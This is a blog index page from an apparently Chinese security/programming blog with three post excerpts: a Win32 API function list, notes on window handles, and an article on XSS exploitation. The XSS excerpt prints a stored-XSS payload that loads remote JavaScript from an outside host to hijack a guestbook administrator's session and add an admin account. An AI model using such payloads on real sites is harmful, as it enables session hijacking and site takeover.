分类

学习笔记 [17]
渗透测试 [4]
一些杂文 [14]
coding [16]
漏洞信息 [17]
技术文章 [15]
开发文档 [8]
个人作品 [5]
PS:个人作品在各种下载栏目均有下载

站内搜索

日历

«  April 2010  »
Su Mo Tu We Th Fr Sa
    123
45678910
11121314151617
18192021222324
252627282930

友情链接

  • 莫良博客
  • 冷夜博客
  • 八神博客
  • Tm3yShell7
  • 2idy电影网
  • Blueandhack's Blog
  • 幻泉博客
  • 羽蛇
  • Elaf
  • 小冰's Blog

    • 访问统计(起于2010/10/2)

    访问统计
    PortWatcher's Blog
    Monday, 2025-06-30, 7:46 AM
    Welcome Guest
    Main | Registration | Login | RSS

    Blog

    Main » 2010 » April » 24
    API函数大全

    1. API之网络函数
    2. API之消息函数
    3. API之文件处理函数
    4. API之打印函数
    5. API之文本和字体函数
    6. API之菜单函数
    1. API之网络函数
    WNetAddConnection 创建同一个网络资源的永久性连接
    WNetAddConnection2 创建同一个网络资源的连接
    WNetAddConnection3 创建同一个网络资源的连接
    WNetCancelConnection 结束一个网络连接
    WNetCancelConnection2 结束一个网络连接
    WNetCloseEnum 结束一次枚举操作
    WNetConnectionDialog 启动一个标准对话框,以便建立同网络资源的连接
    WNetDisconnectDialog 启动一个标准对话框,以便断开同网络资源的连接
    WNetEnumResource 枚举网络资源
    WNetGetConnection 获取本地或已连接的一个资源的网络名称
    WNetGetLastError 获取网络错误的扩展错误信息
    WNetGetUniversalName 获取网络中一个文件的远程名称以及/或者UNC(统一命名规范)名称
    WNetGetUser 获取一个网络资源用以连接的名字
    WNetOpenEnum 启动对网络资源进行枚举的过程
    2. API之消息函数
    BroadcastSystemMessage 将一条系统消息广播给系统中所有的顶级窗口
    GetMessagePos 取得消息队列中上一条消息处理完毕时的鼠标指针屏幕位置
    GetMessageTime 取得消息队列中上一条消息处理完毕时的时间
    PostMessage 将一条消息投递到指定窗口的消息队列
    PostThreadMessage 将一条消息投递给应用程序
    RegisterWindowMessage 获取分配给一个字串标识符的消息编号
    ReplyMessage 答复一个消息
    SendMessage 调用一个窗口的窗口函数,将一条消息发给那个窗口
    SendMessageCallback 将一条消息 ... Read more »
    Category: 开发文档 | Views: 654 | Added by: Jury | Date: 2010-04-25 | Comments (2)

    xss的部分利用技术


    信息来源:邪八
      以往对XSS的利用大多数都是针对于挂马,钓鱼,盗cookie等,这些方式并没有真正发挥到XSS的作用,因为很少人能了解XSS的实质,会话劫持,浏览器劫持,XSS能做到的东西远远超乎我们的想象。


    一 XSS下提升权限
    随着AJAX技术在许多大型SNS网站的应用,XSS也变得愈加流行,在XSS场景下运用AJAX能更有效地发挥它的作用。
    用户输入的地方最容易滋生XSS,譬如留言、评论等表单,我搭建了一个sdbook的留言本,因为sdbook没有对用户输入的变量作出合适的过滤,导致一个XSS的产生。
    留言率先传递给管理员,当作javascript劫持,我们就可以利用管理员的权限做任何事情,例如添加一个管理员。




    在留言内容输入跨站代码:
    <script>s=document.createElement("script");s.src="http://www.xss.com/xss.js";document.getElementsByTagName("head")[0].appendChild(s);</script>


    这段代码用来加载远程的JS,而xss.js的内容是利用xmlHttp对象发送一个异步请求,通过XMLHTTP无刷新提交到服务器端,模拟添加 ... Read more »
    Category: 技术文章 | Views: 576 | Added by: Jury | Date: 2010-04-25 | Comments (0)

    win32 API窗口句柄 HWND(关于句柄的资料整理)
      在Windows编程中我们时刻接触到一个称为句柄(HANDLE)的东西。可以这样去理解句柄,Windows程序中产生的任何资源(要占用某一块或大或小的内存),如图标,光标,窗口,应用程序的实例(已加载到内存运行中的程序)。操作系统每产生一个这样的资源时,都要将它们放入相应的内存,并为这些内存指定一个唯一的标识号,这个标识号即该资源的句柄。操作系统要管理和操作这些资源,都是通过句柄来找到对应的资源的。按资源的类型,又可将句柄细分成图标句柄(HICON),光标句柄(HCURSOR),窗口句柄(HWND),应用程序实例句柄(HINSTANCE),等等各种类型的句柄。操作系统给每一个窗口指定的一个唯一的标识号即窗口句柄。
     
    下面是HWND的定义:
    DECLARE_HANDLE (HWND);

    #ifdef STRICT
    typedef void *HANDLE;
    #define DECLARE_HANDLE(name) struct name##__ { int unused; }; typedef struct name##__ *name
    #else
    typedef PVOID HANDLE;
    #define DECLARE_HANDLE(name) typedef HANDLE name
    #endif
     
     
    Usually, the main information of a handle is an integer index into an internal table. But this is not always true. GDI handles have extra information like object type and a re-use count. Some handles are actually pointers.

    There are three major groups of handles:

    1) kernel handles, exposed by KER ... Read more »
    Category: 学习笔记 | Views: 1186 | Added by: Jury | Date: 2010-04-24 | Comments (1)


    admin@portwatcher.net |